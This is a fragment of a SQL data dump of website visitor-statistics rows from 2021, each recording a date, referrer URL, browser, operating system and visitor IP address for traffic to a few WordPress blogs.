(11684,'2021-05-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(11685,'2021-05-18','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','192.227.139.195','000',0,2,0),
(11686,'2021-05-18','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.34','000',0,1,0),
(11687,'2021-05-18','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','45.92.228.52','000',0,1,0),
(11688,'2021-05-18','https://www.google.com/','Chrome','Fedora','Unknown',NULL,NULL,'','45.238.183.10','000',0,1,0),
(11689,'2021-05-18','http://ictbank.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','191.253.113.186','000',0,2,0),
(11690,'2021-05-18','http://mail.design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','212.175.35.192','000',0,2,0),
(11691,'2021-05-19','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','3.141.199.233','000',0,2,0),
(11692,'2021-05-19','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','209.97.139.85','000',0,2,0),
(11693,'2021-05-19','http://design-arena.ir/blog','Opera','Windows','6.1',NULL,NULL,'','185.213.155.162','000',0,3,0),
(11694,'2021-05-19','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(11695,'2021-05-19','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','45.92.228.52','000',0,2,0),
(11696,'2021-05-19','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(11697,'2021-05-19','http://ictbank.ir/blog','Firefox','OS X','10.12',NULL,NULL,'','213.239.193.124','000',0,15,0),
(11698,'2021-05-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.191.195.138','000',0,1,0),
(11699,'2021-05-19','http://design-arena.ir/blog','Baidu Browser','Android','9',NULL,NULL,'','124.126.78.173','000',0,1,0),
(11700,'2021-05-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.182.238','000',0,1,0),
(11701,'2021-05-19','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.109','000',0,3,0),
(11702,'2021-05-19','http://ictbank.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','201.141.113.233','000',0,1,0),
(11703,'2021-05-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','139.162.207.84','000',0,1,0),
(11704,'2021-05-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,2,0),
(11705,'2021-05-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(11706,'2021-05-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(11707,'2021-05-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(11708,'2021-05-19','http://design-arena.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','109.70.100.45','000',0,1,0),
(11709,'2021-05-19','http://ictbank.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','54.39.29.64','000',0,1,0),
(11710,'2021-05-19','http://mail.design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','113.176.163.78','000',0,2,0),
(11711,'2021-05-19','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','24.94.31.250','000',0,1,0),
(11712,'2021-05-20','http://ictbank.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','182.253.106.100','000',0,2,0),
(11713,'2021-05-20','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','35.178.16.1','000',0,6,0),
(11714,'2021-05-20','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.196','000',0,3,0),
(11715,'2021-05-20','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','192.227.139.220','000',0,22,0),
(11716,'2021-05-20','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','18.229.73.207','000',0,6,0),
(11717,'2021-05-20','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(11718,'2021-05-20','http://ictbank.ir/blog','Safari','OS X','10.15.7',NULL,NULL,'','79.127.96.129','000',0,55,0),
(11719,'2021-05-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(11720,'2021-05-20','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','107.173.209.117','000',0,9,0),
(11721,'2021-05-20','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','172.105.20.145','000',0,1,0),
(11722,'2021-05-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.211.56.35','000',0,1,0),
(11723,'2021-05-20','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','86.57.9.181','000',0,5,0),
(11724,'2021-05-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','167.172.110.186','000',0,1,0),
(11725,'2021-05-20','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','94.102.49.193','000',0,1,0),
(11726,'2021-05-21','http://ictbank.ir/blog_new','Safari','OS X','10.15.7',NULL,NULL,'','79.127.96.129','000',0,72,0),
(11727,'2021-05-21','http://ictbank.ir/blog_new','Unknown','Unknown','Unknown',NULL,NULL,'','167.172.110.221','000',0,1,0),
(11728,'2021-05-22','http://ictbank.ir/blog_new/category/database/','Safari','OS X','10.15.7',NULL,NULL,'','79.127.96.129','000',0,22,0),
(11729,'2021-05-23','http://ictbank.ir/blog_new/wp-admin/plugins.php','Chrome','OS X','10.15.7',NULL,NULL,'','5.124.81.224','000',0,2,0),
(11730,'2021-05-28','http://ictbank.ir/blog_new','Chrome','Windows','10.0',NULL,NULL,'','79.127.96.129','000',0,13,0),
(11732,'2021-06-03','http://ictbank.ir/blog_new','Chrome','Windows','10.0',NULL,NULL,'','79.127.96.129','000',0,2,0),
(11733,'2021-06-05','http://ictbank.ir/blog_new','Unknown','Unknown','Unknown',NULL,NULL,'','167.172.97.238','000',0,1,0),
(11734,'2021-06-14','http://ictbank.ir/blog_new','Chrome','OS X','10.15.7',NULL,NULL,'','79.127.96.129','000',0,6,0),
(11735,'2021-06-21','http://ictbank.ir/blog_new','Chrome','OS X','10.15.7',NULL,NULL,'','79.127.96.129','000',0,4,0),
(11736,'2021-06-24','http://ictbank.ir/blog_new/wp-admin/customize.php?return=%2Fblog_new%2Fwp-admin%2Fupdate-core.php%3Faction%3Ddo-theme-upgrade','Chrome','OS X','10.15.7',NULL,NULL,'','79.127.96.129','000',0,1,0),
(11737,'2021-06-26','http://ictbank.ir/blog_new/wp-login.php?redirect_to=http%3A%2F%2Fictbank.ir%2Fblog_new%2Fwp-admin%2Fcustomize.php%3Freturn%3D%252Fblog_new%252Fwp-admin%252Fupdate-core.php%253Faction%253Ddo-theme-upgrade&reauth=1','Chrome','OS X','10.15.7',NULL,NULL,'','5.113.50.35','000',0,19,0),
(11738,'2021-06-26','http://mail.design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','181.46.151.97','000',0,2,0),
(11739,'2021-06-26','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.22','000',0,2,0),
(11740,'2021-06-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.215.42.97','000',0,2,0),
(11741,'2021-06-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(11742,'2021-06-26','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','89.36.224.7','000',0,2,0),
(11743,'2021-06-26','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','103.154.184.200','000',0,4,0),
(11744,'2021-06-26','http://ictbank.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','180.244.130.113','000',0,2,0),
(11745,'2021-06-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(11746,'2021-06-26','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','151.244.128.55','000',0,1,0),
(11747,'2021-06-26','http://mail.design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','202.184.117.48','000',0,2,0),
(11748,'2021-06-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.23.97','000',0,1,0),
(11749,'2021-06-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(11750,'2021-06-26','http://mail.design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','201.215.232.187','000',0,2,0),
(11751,'2021-06-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,2,0),
(11752,'2021-06-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.128.254.37','000',0,1,0),
(11753,'2021-06-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(11754,'2021-06-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.123','000',0,6,0),
(11755,'2021-06-26','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','195.9.109.190','000',0,2,0),
(11756,'2021-06-26','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(11757,'2021-06-26','https://www.google.com/','Chrome','Linux','Unknown',NULL,NULL,'','217.149.174.220','000',0,2,0),
(11758,'2021-06-26','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','94.158.245.33','000',0,2,0),
(11759,'2021-06-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','209.97.174.248','000',0,1,0),
(11760,'2021-06-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.12','000',0,2,0),
(11761,'2021-06-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(11762,'2021-06-27','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','10.0',NULL,NULL,'','92.204.174.134','000',0,3,0),
(11763,'2021-06-27','http://ftp.design-arena.ir/blog','Chrome','Android','9',NULL,NULL,'','61.135.15.164','000',0,2,0),
(11764,'2021-06-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.92.175','000',0,1,0),
(11765,'2021-06-27','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','103.120.6.120','000',0,2,0),
(11766,'2021-06-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.206.239','000',0,1,0),
(11767,'2021-06-27','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','5.188.62.214','000',0,1,0),
(11768,'2021-06-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','193.107.216.219','000',0,2,0),
(11769,'2021-06-27','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.123','000',0,6,0),
(11770,'2021-06-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.14.56','000',0,2,0),
(11771,'2021-06-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','128.199.160.116','000',0,1,0),
(11772,'2021-06-27','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','198.20.69.98','000',0,2,0),
(11773,'2021-06-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.12.152.251','000',0,1,0),
(11774,'2021-06-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','79.132.213.206','000',0,1,0),
(11775,'2021-06-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(11776,'2021-06-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.13.106','000',0,1,0),
(11777,'2021-06-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.214','000',0,1,0),
(11778,'2021-06-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(11779,'2021-06-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(11780,'2021-06-27','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','124.120.181.198','000',0,2,0),
(11781,'2021-06-27','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','89.36.224.7','000',0,1,0),
(11782,'2021-06-27','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','167.71.90.202','000',0,4,0),
(11783,'2021-06-28','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.12','000',0,2,0),
(11784,'2021-06-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(11785,'2021-06-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','3.142.221.254','000',0,3,0),
(11786,'2021-06-28','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(11787,'2021-06-28','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','223.166.74.237','000',0,1,0),
(11788,'2021-06-28','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','58.248.209.7','000',0,2,0),
(11789,'2021-06-28','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.123','000',0,6,0),
(11790,'2021-06-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.40.4.126','000',0,3,0),
(11791,'2021-06-28','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','89.36.224.7','000',0,2,0),
(11792,'2021-06-28','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','146.192.247.74','000',0,2,0),
(11793,'2021-06-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.62.76','000',0,2,0),
(11794,'2021-06-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.3.146.236','000',0,2,0),
(11795,'2021-06-28','http://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','23.228.109.147','000',0,1,0),
(11796,'2021-06-28','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(11797,'2021-06-28','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.141','000',0,1,0),
(11798,'2021-06-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.50.122','000',0,1,0),
(11799,'2021-06-28','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.107','000',0,1,0),
(11800,'2021-06-28','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.226','000',0,2,0),
(11801,'2021-06-28','http://mail.design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','213.155.217.27','000',0,2,0),
(11802,'2021-06-28','http://82.102.9.14/blog','Chrome','OS X','Unknown',NULL,NULL,'','205.185.116.25','000',0,2,0),
(11803,'2021-06-28','http://82.102.9.14/blog','Chrome','OS X','Unknown',NULL,NULL,'','209.141.54.28','000',0,1,0),
(11804,'2021-06-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.93.235','000',0,1,0),
(11805,'2021-06-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.11.114','000',0,1,0),
(11806,'2021-06-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(11807,'2021-06-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(11808,'2021-06-28','http://82.102.9.14:80/blog','Unknown','Android','10',NULL,NULL,'','121.5.109.55','000',0,2,0),
(11809,'2021-06-28','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.14','000',0,1,0),
(11810,'2021-06-28','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','54.189.230.128','000',0,2,0),
(11811,'2021-06-29','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.123','000',0,12,0),
(11812,'2021-06-29','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(11813,'2021-06-29','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.10','000',0,2,0),
(11814,'2021-06-29','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','89.36.224.7','000',0,1,0),
(11815,'2021-06-29','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','117.50.110.69','000',0,1,0),
(11816,'2021-06-29','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.21','000',0,2,0),
(11817,'2021-06-29','http://ictbank.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','46.48.156.167','000',0,2,0),
(11818,'2021-06-29','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','94.184.141.133','000',0,2,0),
(11819,'2021-06-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(11820,'2021-06-29','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','76.72.172.163','000',0,2,0),
(11821,'2021-06-29','http://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','23.228.109.147','000',0,2,0),
(11822,'2021-06-29','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','5.112.88.138','000',0,2,0),
(11823,'2021-06-29','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','178.62.108.218','000',0,4,0),
(11824,'2021-06-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.212.12.41','000',0,2,0),
(11825,'2021-06-29','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','177.36.13.106','000',0,2,0),
(11826,'2021-06-29','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.143','000',0,2,0),
(11827,'2021-06-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','162.55.175.60','000',0,2,0),
(11828,'2021-06-29','http://ictbank.ir/blog','Chrome','Android','11',NULL,NULL,'','73.26.165.12','000',0,2,0),
(11829,'2021-06-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.68.39.170','000',0,2,0),
(11830,'2021-06-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.144.29.40','000',0,3,0),
(11831,'2021-06-29','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','91.207.102.153','000',0,1,0),
(11832,'2021-06-29','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.239.26.111','000',0,1,0),
(11833,'2021-06-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.95.45','000',0,1,0),
(11834,'2021-06-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.128.254.37','000',0,1,0),
(11835,'2021-06-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(11836,'2021-06-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(11837,'2021-06-29','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.188.182.86','000',0,3,0),
(11838,'2021-06-29','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','62.16.5.165','000',0,2,0),
(11839,'2021-06-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(11840,'2021-06-29','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','89.36.224.5','000',0,1,0),
(11841,'2021-06-29','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','175.147.110.249','000',0,2,0),
(11842,'2021-06-30','http://ictbank.ir/blog','Android Browser','Android','3.0',NULL,NULL,'','220.181.77.162','000',0,6,0),
(11843,'2021-06-30','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','221.213.75.28','000',0,1,0),
(11844,'2021-06-30','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(11845,'2021-06-30','https://google.com','Chrome','Linux','Unknown',NULL,NULL,'','89.248.168.108','000',0,3,0),
(11846,'2021-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','46.101.135.87','000',0,1,0),
(11847,'2021-06-30','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(11848,'2021-06-30','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.191.34.215','000',0,7,0),
(11849,'2021-06-30','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.123','000',0,6,0),
(11850,'2021-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.184.227.118','000',0,2,0),
(11851,'2021-06-30','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.40.4.115','000',0,2,0),
(11852,'2021-06-30','http://ictbank.ir/blog','Opera','Windows','6.0',NULL,NULL,'','91.205.160.96','000',0,2,0),
(11853,'2021-06-30','http://ictbank.ir/','Firefox','Linux','Unknown',NULL,NULL,'','90.113.22.193','000',0,3,0),
(11854,'2021-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.32.64','000',0,1,0),
(11855,'2021-06-30','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.255.65.124','000',0,4,0),
(11856,'2021-06-30','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','159.65.12.114','000',0,2,0),
(11857,'2021-06-30','http://ictbank.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','95.90.239.88','000',0,2,0),
(11858,'2021-06-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(11859,'2021-06-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.128.254.37','000',0,1,0),
(11860,'2021-06-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(11861,'2021-06-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(11862,'2021-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','142.93.213.183','000',0,2,0),
(11863,'2021-07-01','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','89.36.224.5','000',0,3,0),
(11864,'2021-07-01','http://mail.design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','110.172.191.18','000',0,2,0),
(11865,'2021-07-01','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','76.72.172.170','000',0,2,0),
(11866,'2021-07-01','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','59.16.144.85','000',0,1,0),
(11867,'2021-07-01','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','121.169.120.52','000',0,1,0),
(11868,'2021-07-01','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','220.64.91.247','000',0,1,0),
(11869,'2021-07-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.40.4.115','000',0,2,0),
(11870,'2021-07-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','45.33.96.205','000',0,2,0),
(11871,'2021-07-01','http://ictbank.ir/blog','Opera','Windows','6.0',NULL,NULL,'','91.205.160.96','000',0,2,0),
(11872,'2021-07-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.40.4.126','000',0,1,0),
(11873,'2021-07-01','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.64.179','000',0,1,0),
(11874,'2021-07-01','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','185.192.69.247','000',0,2,0),
(11875,'2021-07-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.144.29.40','000',0,3,0),
(11876,'2021-07-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.61.124','000',0,1,0),
(11877,'2021-07-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(11878,'2021-07-01','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','100.21.218.158','000',0,1,0),
(11879,'2021-07-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.161.84.56','000',0,1,0),
(11880,'2021-07-01','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','1.202.113.153','000',0,1,0),
(11881,'2021-07-01','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','45.79.139.31','000',0,2,0),
(11882,'2021-07-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.13.106','000',0,1,0),
(11883,'2021-07-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.11.114','000',0,1,0),
(11884,'2021-07-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,2,0),
(11885,'2021-07-01','http://ictbank.ir/blog','Chrome','Chrome OS','Unknown',NULL,NULL,'','69.51.24.27','000',0,2,0),
(11886,'2021-07-01','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(11887,'2021-07-01','http://ictbank.ir/blog','Chrome','OS X','10.14.1',NULL,NULL,'','5.135.42.57','000',0,1,0),
(11888,'2021-07-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(11889,'2021-07-01','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','203.170.162.106','000',0,2,0),
(11890,'2021-07-01','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(11891,'2021-07-02','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','76.72.172.165','000',0,1,0),
(11892,'2021-07-02','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','185.43.60.130','000',0,3,0),
(11893,'2021-07-02','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','89.36.224.5','000',0,2,0),
(11894,'2021-07-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.36.65.171','000',0,2,0),
(11895,'2021-07-02','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(11896,'2021-07-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,4,0),
(11897,'2021-07-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.111.89','000',0,1,0),
(11898,'2021-07-02','http://ictbank.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','196.217.165.23','000',0,2,0),
(11899,'2021-07-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(11900,'2021-07-02','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(11901,'2021-07-02','https://www.google.com/','Chrome','Android','8.1.0',NULL,NULL,'','41.144.76.215','000',0,2,0),
(11902,'2021-07-02','http://ictbank.ir/blog/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Android','8.1.0',NULL,NULL,'','41.144.76.40','000',0,1,0),
(11903,'2021-07-02','http://mail.design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','174.55.63.86','000',0,2,0),
(11904,'2021-07-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(11905,'2021-07-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.214','000',0,1,0),
